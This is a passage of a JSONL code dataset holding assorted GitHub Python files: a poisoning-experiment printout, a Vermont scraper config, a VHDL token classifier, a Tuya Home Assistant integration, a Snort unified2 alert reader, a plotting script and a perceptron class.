acc: %.3f' %acc)\n print('optimizer: ' + functions['optimizer'] )\n print('training method: ' + training_info['training_type'])\n print('Is poisoning attack: '+ str(training_info['is_poisoning']))\n if training_info['is_poisoning']:\n print('poisoning attack:' + training_info['poisoning_type'])\n print('poisoning fraction: '+ str(training_info['poisoning_fraction']))\n if training_info['poisoning_type'] == 'gradient_ascent':\n print('poisoning degree: '+ str(training_info['posioned_round']))\n print('-------------------------------------------------')\n","repo_name":"changhongyan123/poisoning","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29838092217","text":"metadata = dict(\n name='Vermont',\n abbreviation='vt',\n legislature_name='Vermont General Assembly',\n upper_chamber_name='Senate',\n 
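# NOTE: the empty 'terms' list declared below is populated by the loop that follows this dict\n    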
lower_chamber_name='House of Representatives',\n    upper_chamber_title='Senator',\n    lower_chamber_title='Representative',\n    upper_chamber_term=2,\n    lower_chamber_term=2,\n    terms=[],\n)\n\n# Populate 'sessions' and 'session_details'\nfor year in [y for y in xrange(1987, 2010) if y % 2]:\n    term = \"%d-%d\" % (year, year + 1)\n    metadata['terms'].append(dict(\n        name=term,\n        start_year=year,\n        end_year=year + 1,\n        sessions=[term]))\n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/vt/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22956687553","text":"\nfrom vsg.token import context_reference as token\n\nfrom vsg.vhdlFile import utils\n\nfrom vsg.vhdlFile.classify import utils as classify_utils\n\n\ndef detect(iCurrent, lObjects):\n    '''\n    context_reference ::=\n        context selected_name { , selected_name } ;\n    '''\n    if utils.object_value_is(lObjects, iCurrent, 'context'):\n        if not utils.find_in_range('is', iCurrent, ';', lObjects):\n            return classify(iCurrent, lObjects)\n    return iCurrent\n\n\ndef classify(iToken, lObjects):\n\n    iCurrent = utils.assign_next_token_required('context', token.keyword, iToken, lObjects)\n    iCurrent = classify_utils.classify_selected_name(iCurrent, lObjects, token)\n    while utils.is_next_token(',', iCurrent, lObjects):\n        iCurrent = utils.assign_next_token_required(',', token.comma, iCurrent, lObjects)\n        iCurrent = classify_utils.classify_selected_name(iCurrent, lObjects, token)\n\n    iCurrent = utils.assign_next_token_required(';', token.semicolon, iCurrent, lObjects)\n    return iCurrent\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/vhdlFile/classify/context_reference.py","file_name":"context_reference.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"20917428137","text":"def solve(numLegs,numHeads):\n    for numChicks in range(0, numHeads + 1):\n        numPlgs = numHeads - numChicks\n        totLegs = 4 *numPlgs + 2 *numChicks\n        if totLegs == numLegs:\n            return (numPlgs,numChicks)\n    return(None, None)\n\ndef barnyard():\n    heads = input(\"Enter number of heads: \")\n    legs = input(\"Enter a number of legs: \")\n    # solve() expects legs first, then heads\n    pigs, chickens = solve(int(legs),int(heads))\n    if pigs == None:\n        print(\"There is no solution \")\n    else:\n        print(\"Number of pigs:\", pigs)\n        print(\"Number of chickens:\", chickens)\n","repo_name":"munalshah13/Python_Exercises","sub_path":"PigsandChickens.py","file_name":"PigsandChickens.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15331188529","text":"\"\"\"\nPlatform for Tuya WiFi-connected devices.\n\nBased on nikrolls/homeassistant-goldair-climate for Goldair branded devices.\nBased on sean6541/tuya-homeassistant for service call logic, and TarxBoy's\ninvestigation into Goldair's tuyapi statuses\nhttps://github.com/codetheweb/tuyapi/issues/31.\n\"\"\"\nimport logging\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_HOST\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.helpers.entity_registry import async_migrate_entries\nfrom homeassistant.util import slugify\n\nfrom .const import (\n    CONF_DEVICE_ID,\n    CONF_LOCAL_KEY,\n    CONF_POLL_ONLY,\n    CONF_PROTOCOL_VERSION,\n    CONF_TYPE,\n    DOMAIN,\n)\nfrom .device import 
async_delete_device, get_device_id, setup_device\nfrom .helpers.device_config import get_config\n\n_LOGGER = logging.getLogger(__name__)\nNOT_FOUND = \"Configuration file for %s not found\"\n\n\nasync def async_migrate_entry(hass, entry: ConfigEntry):\n \"\"\"Migrate to latest config format.\"\"\"\n\n CONF_TYPE_AUTO = \"auto\"\n\n if entry.version == 1:\n # Removal of Auto detection.\n config = {**entry.data, **entry.options, \"name\": entry.title}\n if config[CONF_TYPE] == CONF_TYPE_AUTO:\n device = setup_device(hass, config)\n config[CONF_TYPE] = await device.async_inferred_type()\n if config[CONF_TYPE] is None:\n _LOGGER.error(\n \"Unable to determine type for device %s\",\n config[CONF_DEVICE_ID],\n )\n return False\n\n entry.data = {\n CONF_DEVICE_ID: config[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: config[CONF_LOCAL_KEY],\n CONF_HOST: config[CONF_HOST],\n }\n entry.version = 2\n\n if entry.version == 2:\n # CONF_TYPE is not configurable, move from options to main config.\n config = {**entry.data, **entry.options, \"name\": entry.title}\n opts = {**entry.options}\n # Ensure type has been migrated. Some users are reporting errors which\n # suggest it was removed completely. But that is probably due to\n # overwriting options without CONF_TYPE.\n if config.get(CONF_TYPE, CONF_TYPE_AUTO) == CONF_TYPE_AUTO:\n device = setup_device(hass, config)\n config[CONF_TYPE] = await device.async_inferred_type()\n if config[CONF_TYPE] is None:\n _LOGGER.error(\n \"Unable to determine type for device %s\",\n config[CONF_DEVICE_ID],\n )\n return False\n entry.data = {\n CONF_DEVICE_ID: config[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: config[CONF_LOCAL_KEY],\n CONF_HOST: config[CONF_HOST],\n CONF_TYPE: config[CONF_TYPE],\n }\n opts.pop(CONF_TYPE, None)\n entry.options = {**opts}\n entry.version = 3\n\n if entry.version == 3:\n # Migrate to filename based config_type, to avoid needing to\n # parse config files to find the right one.\n config = {**entry.data, **entry.options, \"name\": entry.title}\n config_type = get_config(config[CONF_TYPE]).config_type\n\n # Special case for kogan_switch. 
Consider also v2.\n if config_type == \"smartplugv1\":\n device = setup_device(hass, config)\n config_type = await device.async_inferred_type()\n if config_type != \"smartplugv2\":\n config_type = \"smartplugv1\"\n\n entry.data = {\n CONF_DEVICE_ID: config[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: config[CONF_LOCAL_KEY],\n CONF_HOST: config[CONF_HOST],\n CONF_TYPE: config_type,\n }\n entry.version = 4\n\n if entry.version <= 5:\n # Migrate unique ids of existing entities to new format\n old_id = entry.unique_id\n conf_file = get_config(entry.data[CONF_TYPE])\n if conf_file is None:\n _LOGGER.error(NOT_FOUND, entry.data[CONF_TYPE])\n return False\n\n @callback\n def update_unique_id(entity_entry):\n \"\"\"Update the unique id of an entity entry.\"\"\"\n e = conf_file.primary_entity\n if e.entity != entity_entry.platform:\n for e in conf_file.secondary_entities():\n if e.entity == entity_entry.platform:\n break\n if e.entity == entity_entry.platform:\n new_id = e.unique_id(old_id)\n if new_id != old_id:\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n\n await async_migrate_entries(hass, entry.entry_id, update_unique_id)\n entry.version = 6\n\n if entry.version <= 8:\n # Deprecated entities are removed, trim the config back to required\n # config only\n conf = {**entry.data, **entry.options}\n entry.data = {\n CONF_DEVICE_ID: conf[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: conf[CONF_LOCAL_KEY],\n CONF_HOST: conf[CONF_HOST],\n CONF_TYPE: conf[CONF_TYPE],\n }\n entry.options = {}\n entry.version = 9\n\n if entry.version <= 9:\n # Added protocol_version, default to auto\n conf = {**entry.data, **entry.options}\n entry.data = {\n CONF_DEVICE_ID: conf[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: conf[CONF_LOCAL_KEY],\n CONF_HOST: conf[CONF_HOST],\n CONF_TYPE: conf[CONF_TYPE],\n CONF_PROTOCOL_VERSION: \"auto\",\n }\n entry.options = {}\n entry.version = 10\n\n if entry.version <= 10:\n conf = entry.data | entry.options\n entry.data = {\n CONF_DEVICE_ID: conf[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: conf[CONF_LOCAL_KEY],\n CONF_HOST: conf[CONF_HOST],\n CONF_TYPE: conf[CONF_TYPE],\n CONF_PROTOCOL_VERSION: \"auto\",\n CONF_POLL_ONLY: False,\n }\n entry.options = {}\n entry.version = 11\n\n if entry.version <= 11:\n # Migrate unique ids of existing entities to new format\n device_id = entry.unique_id\n conf_file = get_config(entry.data[CONF_TYPE])\n if conf_file is None:\n _LOGGER.error(\n NOT_FOUND,\n entry.data[CONF_TYPE],\n )\n return False\n\n @callback\n def update_unique_id12(entity_entry):\n \"\"\"Update the unique id of an entity entry.\"\"\"\n old_id = entity_entry.unique_id\n platform = entity_entry.entity_id.split(\".\", 1)[0]\n e = conf_file.primary_entity\n if e.name:\n expect_id = f\"{device_id}-{slugify(e.name)}\"\n else:\n expect_id = device_id\n if e.entity != platform or expect_id != old_id:\n for e in conf_file.secondary_entities():\n if e.name:\n expect_id = f\"{device_id}-{slugify(e.name)}\"\n else:\n expect_id = device_id\n if e.entity == platform and expect_id == old_id:\n break\n\n if e.entity == platform and expect_id == old_id:\n new_id = e.unique_id(device_id)\n if new_id != old_id:\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n\n await async_migrate_entries(hass, entry.entry_id, update_unique_id12)\n entry.version = 12\n\n if 
entry.version <= 12:\n # Migrate unique ids of existing entities to new format taking into\n # account device_class if name is missing.\n device_id = entry.unique_id\n conf_file = get_config(entry.data[CONF_TYPE])\n if conf_file is None:\n _LOGGER.error(\n NOT_FOUND,\n entry.data[CONF_TYPE],\n )\n return False\n\n @callback\n def update_unique_id13(entity_entry):\n \"\"\"Update the unique id of an entity entry.\"\"\"\n old_id = entity_entry.unique_id\n platform = entity_entry.entity_id.split(\".\", 1)[0]\n # if unique_id ends with platform name, then this may have\n # changed with the addition of device_class.\n if old_id.endswith(platform):\n e = conf_file.primary_entity\n if e.entity != platform or e.name:\n for e in conf_file.secondary_entities():\n if e.entity == platform and not e.name:\n break\n if e.entity == platform and not e.name:\n new_id = e.unique_id(device_id)\n if new_id != old_id:\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n else:\n replacements = {\n \"sensor_co2\": \"sensor_carbon_dioxide\",\n \"sensor_co\": \"sensor_carbon_monoxide\",\n \"sensor_pm2_5\": \"sensor_pm25\",\n \"sensor_pm_10\": \"sensor_pm10\",\n \"sensor_pm_1_0\": \"sensor_pm1\",\n \"sensor_pm_2_5\": \"sensor_pm25\",\n \"sensor_tvoc\": \"sensor_volatile_organic_compounds\",\n \"sensor_current_humidity\": \"sensor_humidity\",\n \"sensor_current_temperature\": \"sensor_temperature\",\n }\n for suffix, new_suffix in replacements.items():\n if old_id.endswith(suffix):\n e = conf_file.primary_entity\n if e.entity != platform or e.name:\n for e in conf_file.secondary_entities():\n if e.entity == platform and not e.name:\n break\n if e.entity == platform and not e.name:\n new_id = e.unique_id(device_id)\n if new_id.endswith(new_suffix):\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n\n await async_migrate_entries(hass, entry.entry_id, update_unique_id13)\n entry.version = 13\n\n return True\n\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):\n _LOGGER.debug(\n \"Setting up entry for device: %s\",\n get_device_id(entry.data),\n )\n config = {**entry.data, **entry.options, \"name\": entry.title}\n setup_device(hass, config)\n device_conf = get_config(entry.data[CONF_TYPE])\n if device_conf is None:\n _LOGGER.error(NOT_FOUND, config[CONF_TYPE])\n return False\n\n entities = set()\n e = device_conf.primary_entity\n entities.add(e.entity)\n for e in device_conf.secondary_entities():\n entities.add(e.entity)\n\n await hass.config_entries.async_forward_entry_setups(entry, entities)\n\n entry.add_update_listener(async_update_entry)\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):\n _LOGGER.debug(\"Unloading entry for device: %s\", get_device_id(entry.data))\n config = entry.data\n data = hass.data[DOMAIN][get_device_id(config)]\n device_conf = get_config(config[CONF_TYPE])\n if device_conf is None:\n _LOGGER.error(NOT_FOUND, config[CONF_TYPE])\n return False\n\n entities = {}\n e = device_conf.primary_entity\n if e.config_id in data:\n entities[e.entity] = True\n for e in device_conf.secondary_entities():\n if e.config_id in data:\n entities[e.entity] = True\n\n for e in entities:\n await hass.config_entries.async_forward_entry_unload(entry, e)\n\n await async_delete_device(hass, 
config)\n del hass.data[DOMAIN][get_device_id(config)]\n\n return True\n\n\nasync def async_update_entry(hass: HomeAssistant, entry: ConfigEntry):\n _LOGGER.debug(\"Updating entry for device: %s\", get_device_id(entry.data))\n await async_unload_entry(hass, entry)\n await async_setup_entry(hass, entry)\n","repo_name":"make-all/tuya-local","sub_path":"custom_components/tuya_local/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13549,"program_lang":"python","lang":"en","doc_type":"code","stars":613,"dataset":"github-code","pt":"61"} +{"seq_id":"13055954190","text":"from maxent_sampling import *\nfrom formosa_utils import mean_ci\n\ndef test_maxent_motif():\n trials = 1000\n N, L, desired_ic = 10,10,10\n motifs = [maxent_motif(N,L,desired_ic) for i in trange(trials)]\n lb, ub = mean_ci(map(motif_ic,motifs))\n assert lb < desired_ic < ub\n\ndef test_spoof_maxent_motifs():\n trials = 1000\n motif = ['CGGTGAACTA',\n 'CGGTGTGCGA',\n 'CGCTGTGCTG',\n 'CGGGATGCAA',\n 'CACGCTACGA',\n 'CGCTATGCTA',\n 'CGGTTGGCTA',\n 'CGGCGTGCTA',\n 'CGGTATATTG',\n 'CGGGTTGCGA']\n given_ic = motif_ic(motif) # ~ 9.05 bits\n motifs = spoof_maxent_motifs(motif,trials)\n lb, ub = mean_ci(map(motif_ic,motifs))\n assert lb < given_ic < ub\n","repo_name":"poneill/formosa","sub_path":"tests/test_maxent_sampling.py","file_name":"test_maxent_sampling.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29274561365","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport os.path\n\nif sys.argv[0] == __file__:\n sys.path.insert(\n 0, os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"..\")))\n\nimport time\nimport logging\n\ntry:\n import argparse\nexcept ImportError as err:\n from idstools.compat.argparse import argparse\n\nfrom idstools import unified2\nfrom idstools import maps\n\nlogging.basicConfig(level=logging.INFO, format=\"%(message)s\")\nLOG = logging.getLogger()\n\nproto_map = {\n 1: \"ICMP\",\n 6: \"TCP\",\n 17: \"UDP\",\n}\n\ndef print_time(sec, usec):\n tt = time.localtime(sec)\n return \"%04d/%02d/%02d-%02d:%02d:%02d.%06d\" % (\n tt.tm_year, tt.tm_mon, tt.tm_mday, tt.tm_hour, tt.tm_min, tt.tm_sec,\n usec)\n\ndef print_event(event, msgmap, classmap):\n msg_entry = msgmap.get(event[\"generator-id\"], event[\"signature-id\"])\n if msg_entry:\n msg = msg_entry[\"msg\"]\n else:\n msg = \"Snort Event\"\n\n class_entry = classmap.get(event[\"classification-id\"])\n if class_entry:\n class_description = class_entry[\"description\"]\n else:\n class_description = str(event[\"classification-id\"])\n\n proto = proto_map.get(event[\"protocol\"], str(event[\"protocol\"]))\n\n print(\"%s [**] [%d:%d:%d] %s [**] [Classification: %s] [Priority: %d] {%s} %s:%d -> %s:%d\" % (\n print_time(event[\"event-second\"], event[\"event-microsecond\"]),\n event[\"generator-id\"],\n event[\"signature-id\"],\n event[\"signature-revision\"],\n msg,\n class_description,\n event[\"priority\"],\n proto,\n event[\"source-ip\"],\n event[\"sport-itype\"],\n event[\"destination-ip\"],\n event[\"dport-icode\"],\n ))\n\ndef load_from_snort_conf(snort_conf, classmap, msgmap):\n snort_etc = os.path.dirname(snort_conf)\n\n classification_config = os.path.join(snort_etc, \"classification.config\")\n if os.path.exists(classification_config):\n LOG.debug(\"Loading %s.\", classification_config)\n classmap.load_from_file(open(classification_config))\n\n genmsg_map = os.path.join(snort_etc, \"gen-msg.map\")\n 
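# gen-msg.map maps generator/signature id pairs to messages for preprocessor and decoder events\n    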
if os.path.exists(genmsg_map):\n LOG.debug(\"Loading %s.\", genmsg_map)\n msgmap.load_generator_map(open(genmsg_map))\n\n sidmsg_map = os.path.join(snort_etc, \"sid-msg.map\")\n if os.path.exists(sidmsg_map):\n LOG.debug(\"Loading %s.\", sidmsg_map)\n msgmap.load_signature_map(open(sidmsg_map))\n\ndef main():\n\n msgmap = maps.SignatureMap()\n classmap = maps.ClassificationMap()\n\n parser = argparse.ArgumentParser(\n fromfile_prefix_chars='@')\n parser.add_argument(\n \"-C\", dest=\"classification_path\", metavar=\"\",\n help=\"path to classification config\")\n parser.add_argument(\n \"-S\", dest=\"sidmsgmap_path\", metavar=\"\",\n help=\"path to sid-msg.map\")\n parser.add_argument(\n \"-G\", dest=\"genmsgmap_path\", metavar=\"\",\n help=\"path to gen-msg.map\")\n parser.add_argument(\n \"--snort-conf\", dest=\"snort_conf\", metavar=\"\",\n help=\"attempt to load classifications and map files based on the \"\n \"location of the snort.conf\")\n parser.add_argument(\n \"--directory\", metavar=\"\",\n help=\"spool directory (eg: /var/log/snort)\")\n parser.add_argument(\n \"--prefix\", metavar=\"\",\n help=\"spool filename prefix (eg: unified2.log)\")\n parser.add_argument(\n \"--bookmark\", action=\"store_true\", default=False,\n help=\"enable bookmarking\")\n parser.add_argument(\n \"--follow\", action=\"store_true\", default=False,\n help=\"follow files/continuous mode (spool mode only)\")\n parser.add_argument(\n \"filenames\", nargs=\"*\")\n args = parser.parse_args()\n\n if args.snort_conf:\n load_from_snort_conf(args.snort_conf, classmap, msgmap)\n\n if args.classification_path:\n classmap.load_from_file(\n open(os.path.expanduser(args.classification_path)))\n if args.genmsgmap_path:\n msgmap.load_generator_map(open(os.path.expanduser(args.genmsgmap_path)))\n if args.sidmsgmap_path:\n msgmap.load_signature_map(open(os.path.expanduser(args.sidmsgmap_path)))\n\n if msgmap.size() == 0:\n LOG.warning(\"WARNING: No alert message map entries loaded.\")\n else:\n LOG.info(\"Loaded %s rule message map entries.\", msgmap.size())\n\n if classmap.size() == 0:\n LOG.warning(\"WARNING: No classifications loaded.\")\n else:\n LOG.info(\"Loaded %s classifications.\", classmap.size())\n\n if args.directory and args.prefix:\n reader = unified2.SpoolEventReader(\n directory=args.directory,\n prefix=args.prefix,\n follow=args.follow,\n bookmark=args.bookmark)\n\n for event in reader:\n print_event(event, msgmap, classmap)\n\n elif args.filenames:\n reader = unified2.FileEventReader(*args.filenames)\n for event in reader:\n print_event(event, msgmap, classmap)\n\n else:\n parser.print_help()\n return 1\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"jasonish/py-idstools","sub_path":"idstools/scripts/u2fast.py","file_name":"u2fast.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"61"} +{"seq_id":"4706468631","text":"from functools import partial\nimport math\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib.colors import Normalize\nimport matplotlib.pyplot as plt\nimport strafevis.strafe_stats\nfrom matplotlib import cm\nfrom matplotlib.colors import Colormap\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\nclass AngleMap(Colormap):\n def __init__(self, accels, max_accel=None, min_accel=None):\n self.accels = accels\n self.points = len(self.accels)\n if min_accel is not None:\n self.min_accel = min_accel\n else:\n self.min_accel = np.min(accels)\n if max_accel is not 
None:\n            self.max_accel = max_accel\n        else:\n            self.max_accel = np.max(accels)\n        Colormap.__init__(self, None, 255)\n\n    def get_accel(self, val):\n        val *= self.points\n        # clamp so an input of exactly 1.0 does not index past the end of accels\n        val = min(int(val), self.points - 1)\n        return self.accels[val]\n\n    def __call__(self, X, alpha=None, bytes=None):\n        rgba = np.zeros(shape=(len(X), 4))\n\n        for index, val in enumerate(X):\n            accel = self.get_accel(val)\n            rgba[index,3] = 1\n\n            if accel < 0:\n                accel = max(accel, self.min_accel)\n                rgba[index,0] = accel / self.min_accel\n            elif accel > 0:\n                accel = min(accel, self.max_accel)\n                rgba[index,1] = accel / self.max_accel\n\n        return rgba\n\ndef animate_plot_to_pictures(min_speed, max_speed, pictures):\n    axcolor = 'lightgoldenrodyellow'\n    axspeed = plt.axes([0.125, 0.05, 0.65, 0.03], facecolor=axcolor)\n    sspeed = Slider(axspeed, 'Speed', 0, max_speed, valinit=0, valstep=1)\n\n    for i in range(pictures):\n        speed = 1.0 * i / (pictures-1) * max_speed + min_speed\n        accels, rads = strafevis.strafe_stats.get_stats(720, strafevis.strafe_stats.StatType.ACCEL, speed=speed)\n        display_axes = plt.subplot(1, 1, 1, polar=True)\n        norm = mpl.colors.Normalize(0.0, 2 * np.pi)\n        cmap = AngleMap(accels)\n\n        cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap,\n                                       norm=norm,\n                                       orientation='horizontal')\n\n        # aesthetics - get rid of border and axis labels\n        cb.outline.set_visible(False)\n        display_axes.set_axis_off()\n        sspeed.set_val(speed)\n        plt.savefig('pic_%04d.png' % i)\n\ndef plot():\n    accels, rads = strafevis.strafe_stats.get_stats(1000, strafevis.strafe_stats.StatType.ACCEL, speed=100)\n    display_axes = plt.subplot(1, 1, 1, polar=True)\n    norm = mpl.colors.Normalize(0.0, 2 * np.pi)\n    cmap = AngleMap(accels)\n\n    cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap,\n                                   norm=norm,\n                                   orientation='horizontal')\n\n    # aesthetics - get rid of border and axis labels\n    cb.outline.set_visible(False)\n    display_axes.set_axis_off()\n\n    def update(val):\n        accels, rads = strafevis.strafe_stats.get_stats(1000, strafevis.strafe_stats.StatType.ACCEL, speed=sspeed.val)\n        cmap = AngleMap(accels)\n        cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap,\n                                       norm=norm,\n                                       orientation='horizontal')\n\n    axcolor = 'lightgoldenrodyellow'\n    axspeed = plt.axes([0.125, 0.05, 0.65, 0.03], facecolor=axcolor)\n    sspeed = Slider(axspeed, 'Speed', 0, 1000.0, valinit=320, valstep=1)\n    sspeed.on_changed(update)\n\n    plt.show() # Replace with plt.savefig if you want to save a file\n","repo_name":"fabianod/strafevis","sub_path":"strafevis/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22309005558","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport itertools as it\nimport numpy as np\nfrom .label_mapper import LabelMapper\n\nclass Perceptron(object):\n    \"\"\"A perceptron classifier.\n\n    This class implements methods common to all perceptron variants, but cannot\n    be used by itself. 
Always use derived classes instead.\n \"\"\"\n prune_limit = 0.0001\n\n _feature_extractor = None\n _w = None\n\n # for sequence-based prediction:\n _left_context_template = \"__BEGIN_{0}__\"\n _right_context_template = \"__END_{0}__\"\n _initial_history_template = \"__BEGIN_TAG_{0}__\"\n _left_context_size = 0\n _left_context = []\n _right_context = []\n _initial_history = []\n\n def __init__(self, iterations=5, learning_rate=1, averaged=True, \\\n sequenced=False, feature_extractor=None, log_to=None, \\\n progress_func=None, pruning=True):\n self.averaged = averaged\n self.sequenced = sequenced\n self.feature_extractor = feature_extractor\n self.iterations = iterations\n self._label_mapper = LabelMapper()\n self.learning_rate = learning_rate\n self.log_to = log_to\n self.progress_func = progress_func\n self.pruning = pruning\n\n def _log(self, text):\n if self.log_to is not None:\n self.log_to.write(text)\n self.log_to.write(\"\\n\")\n\n def _progress(self, value):\n if self._progress_func is not None:\n self._progress_func(value + self._running_total)\n\n @property\n def feature_count(self):\n if self._feature_extractor is not None:\n return self._feature_extractor.feature_count\n return self._feature_count\n\n @feature_count.setter\n def feature_count(self, value):\n if self._feature_extractor is not None:\n raise AttributeError((\"cannot set feature_count manually \"\n \"when using a feature_extractor\"))\n self._feature_count = value\n\n @property\n def feature_extractor(self):\n return self._feature_extractor\n\n @feature_extractor.setter\n def feature_extractor(self, obj):\n self._feature_extractor = obj\n if obj is not None:\n if self.sequenced:\n self._set_context_attributes(obj)\n self._feature_extractor.sequenced = self.sequenced\n\n @property\n def sequenced(self):\n return self._sequenced\n\n @sequenced.setter\n def sequenced(self, status):\n self._sequenced = status\n if self._feature_extractor is not None:\n self._feature_extractor.sequenced = status\n\n @property\n def progress_func(self):\n return self._progress_func\n\n @progress_func.setter\n def progress_func(self, value):\n if not (callable(value) or value is None):\n raise ValueError(\"progress_func must be callable or None\")\n self._progress_func = value\n\n def train(self, x, y, seed=1):\n \"\"\"Train the perceptron on independent data points.\n\n Parameters:\n x - A list of data points or feature vectors, or (if\n sequenced) a list of data point/feature vector sequences\n y - A list of correct class labels\n \"\"\"\n if self.sequenced:\n train_func = self._perform_train_iteration_sequenced\n else:\n train_func = self._perform_train_iteration_independent\n\n (x, y) = self._preprocess_train(x, y)\n self.reset_weights()\n self._running_total = 0\n all_w = []\n\n for iteration in range(self.iterations):\n # random permutation\n np.random.seed(seed)\n permutation = np.random.permutation(len(x))\n seed += 1\n\n # training\n (correct, total) = train_func(x, y, permutation)\n self._running_total += total\n accuracy = 1.0 * correct / total\n self._log(\"Iteration {0:2}: accuracy {1:.4f}\".format(iteration, accuracy))\n if self.averaged and self.iterations > 1:\n all_w.append(copy.deepcopy(self._w))\n\n if self.averaged and self.iterations > 1:\n self._log(\"Averaging weights...\")\n self._w = self.average_weights(all_w)\n\n if self.pruning:\n self._log(\"Pruning weights...\")\n self.prune_weights()\n\n def average_weights(self, all_w):\n if self.sequenced: # check if feature count changed between iterations\n for w in 
all_w:\n self._resize_weights(w)\n return sum(all_w) / len(all_w)\n\n def predict_all(self, x):\n \"\"\"Predict the class labels of a given dataset (= list of data points/sequences).\n\n The prediction function itself must be implemented by derived classes.\n \"\"\"\n return [self.predict(y) for y in x]\n\n def predict_all_nbest(self, x, n=1):\n \"\"\"Predict the n-best class labels of a given dataset (= list of data\n points/sequences).\n\n The prediction function itself must be implemented by derived classes.\n \"\"\"\n return [self.predict_nbest(y, n=n) for y in x]\n\n def print_weights(self):\n \"\"\"Print the learned weights in a human-readable format.\n\n Should be overridden by the specific perceptron implementations.\n \"\"\"\n print(self._w)\n\n def prune_weights(self):\n \"\"\"Prune the learned weights.\n\n Perceptron implementations can use this, e.g., to remove zero-valued\n features which don't contribute anything to the model.\n \"\"\"\n pass\n\n ############################################################################\n #### Serialization via pickle ##############################################\n ############################################################################\n\n def __getstate__(self):\n return {\n 'averaged': self.averaged,\n 'sequenced': self.sequenced,\n 'feature_extractor': self._feature_extractor,\n 'iterations': self.iterations,\n 'label_mapper': self._label_mapper,\n 'learning_rate': self.learning_rate,\n 'weights': self._w\n }\n\n def __setstate__(self, state):\n self.averaged = state['averaged']\n self.sequenced = state['sequenced']\n self.feature_extractor = state['feature_extractor']\n self.iterations = state['iterations']\n self._label_mapper = state['label_mapper']\n self.learning_rate = state['learning_rate']\n self._w = state['weights']\n\n ############################################################################\n #### Functions to be implemented by derived classes ########################\n ############################################################################\n\n def predict(self, x):\n \"\"\"Predict the class label of a given data point or sequence.\n \"\"\"\n raise NotImplementedError(\"predictor functionality not implemented\")\n\n def predict_nbest(self, x, n=1):\n \"\"\"Predict the n-best class labels of a given data point or sequence.\n \"\"\"\n raise NotImplementedError(\"n-best predictor functionality not implemented\")\n\n def reset_weights(self):\n \"\"\"Reset learned weights.\n \"\"\"\n raise NotImplementedError(\"reset_weights function not implemented\")\n\n def _resize_weights(self, w):\n \"\"\"Resize weights dynamically, if needed.\n \"\"\"\n raise NotImplementedError(\"_resize_weights function not implemented\")\n\n def _perform_train_iteration_independent(self, x, y, permutation):\n raise NotImplementedError(\"training functionality not implemented\")\n\n def _perform_train_iteration_sequenced(self, x, y, permutation):\n raise NotImplementedError(\"training functionality not implemented\")\n\n ############################################################################\n #### Helper functions for sequenced prediction #############################\n ############################################################################\n\n def _set_context_attributes(self, obj):\n \"\"\"Set context attributes from an object providing context size,\n typically the feature extractor.\n\n Required for sequence-based prediction only.\n \"\"\"\n (left_context_size, right_context_size) = obj.context_size\n self._left_context, 
